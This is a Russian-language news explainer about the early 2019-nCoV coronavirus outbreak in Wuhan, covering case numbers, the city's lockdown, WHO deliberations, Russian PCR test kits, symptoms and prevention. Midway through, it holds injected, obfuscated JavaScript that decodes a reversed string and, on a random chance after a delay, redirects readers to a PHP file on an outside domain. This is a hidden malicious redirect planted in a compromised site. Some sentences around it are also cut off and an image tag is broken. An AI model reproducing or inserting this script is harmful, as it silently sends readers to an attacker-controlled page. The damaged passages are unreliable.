В мире вспышка нового коронавируса, уже умерли 17 человек. Что надо знать об этом?

Количество заболевших растет быстро, умерших еще быстрее — почти вдвое за день. Чего нам ждать? Насколько этот коронавирус опасен? И что это вообще такое? Разбор СПИД.ЦЕНТРа.

Что происходит?

В декабре в китайском городе Ухане появилась вспышка нового вида коронавируса 2019-nCov. Он вызывает пневмонию, от которой можно умереть. Сперва медики утверждали, что он не передается от человека человеку, а первые несколько смертей заболевших не связывали напрямую с вирусом, уклончиво отвечая, что у всех скончавшихся были и другие тяжелые заболевания. Но 21 января китайские власти все же официально признали, что вирус передается от человека человеку, а Всемирная организация здравоохранения заявила, что новый вирус может покинуть пределы Китая, и анонсировала на 22 января экстренное совещание комитета по чрезвычайным ситуациям.

По итогам первого дня заседаний генеральный директор ВОЗ Тедрос Аданом Гебреисус расценил ситуацию с новым коронавиурсом как «сложную». «Сегодня состоялась превосходная дискуссия. Но для того, чтобы принять решение, нам нужно больше информации. По этой причине я решил попросить чрезвычайный комитет вновь провести встречу завтра, чтобы продолжить дискуссию», — отметил он.

С утра 23 января жителям Уханя запретили покидать город, а также перестал работать общественный транспорт: метро, паромы и рейсы дальнего следования. Фактически город закрыли на въезд и выезд. «Без особых причин жителям не следует покидать город. Исходящие рейсы из аэропорта и вокзалов временно отменены. О времени их восстановления будет сообщено дополнительно», — подчеркивается в заявлении экстренного штаба по борьбе с распространением пневмонии.

заявили: по последним данным, заболели как минимум 570 человек (в том числе и 15 медиков), 17 человек умерли от пневмонии, вызванной вирусом. Находятся в «критическом состоянии» 95 человек, а в карантин поместили почти 6000 человек, которые были в контакте с заболевшими.

Вечером 22 января в Боткинскую больницу в Санкт-Петербурге доставили двух первых пациентов с подозрением на новый тип коронавируса. Один из них россиянин, который прилетел в Пулково из Шанхая, второй — китаец, прилетевший в Россию около недели назад. Но в итоге у обоих оказалась простуда, так заявили в пресс-службе Минздрава РФ.

В Китае в большинстве регионов страны уже есть заразившиеся, к тому же вирус вышел и за пределы КНР. Случаи нового коронавируса уже зафиксировали в Тайване, Таиланде, Южной Корее, Японии и США.

ввел карантинный досмотр в аэропортах.

В службе попросили граждан до стабилизации ситуации воздержаться от поездок в Ухань и заранее планировать поездки в Китай. При появлении первых симптомов специалисты просят не заниматься самолечением и сразу обращаться за медицинской помощью, информируя медицинский персонал о времени и месте пребывания в КНР.

После расшифровки генома вируса российские ученые из ГНЦ ВБ «Вектор» Роспотребнадзора разработали тест-систему для лабораторной диагностики нового патогена. Она основана на методе молекулярно-генетического анализа (ПЦР).

В ведомстве отмечают, что тесты обладают высокой чувствительностью и могут применяться на ранней стадии заболевания. Результаты готовы за два-четыре часа, а для диагностики используется биоматериал, собранный из носоглотки.

Одна из тест-систем выявляет непосредственно новый коронавирус 2019-nCoV, вторая  может использоваться в том числе для диагностики тяжелого острого респираторного синдрома (ТОРС). Уже к концу недели тест-система начнет поступать в лаборатории.

Ситуацию прокомментировал бывший глава Роспотребнадзора Геннадий Онищенко, который призвал «не сеять панику». В то же время он отметил, что «ситуация серьезная».  «Это повторение 2002 года, когда у нас был SARS (ТОРС) — тяжелый острый респираторный синдром. Ситуация явно была недооценена, раз уже Си Цзиньпин вмешался в это дело и дал очень жесткие установки», — написал он в своем Фейсбуке.

$NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor/pictures/5751/content_coronavirus_cover_colour_change_600.jpg” alt=”” />

Какие симптомы?

Общие признаки инфекции включают респираторные симптомы, лихорадку, кашель, одышку. В более тяжелых случаях инфекция может вызвать пневмонию, тяжелый острый респираторный синдром, диарею, почечную недостаточность.

Какие меры профилактики могут быть?

Стандартные рекомендации по предотвращению распространения инфекции включают регулярное мытье рук, прикрывание рта и носа при кашле и чихании, тщательное приготовление мяса и яиц. Специалисты рекомендуют избегать тесного контакта с кем-либо, у кого проявляются симптомы респираторного заболевания, такие как кашель и чихание.

При поездке в КНР в Роспотребнадзоре также призвали отказаться от посещения зоопарков, рынков, где продаются морепродукты и животные, а также массовых мероприятий с их участием. Употреблять только бутилированную воду и использовать маски для защиты верхних дыхательных путей.

Пока не существует какого-либо специфического лечения нового вируса, однако ученые ведут разработку вакцины. Ее основной может стать разработка штаммов вируса, способных только к однократному размножению.

Подписывайтесь на канал  

Добавить комментарий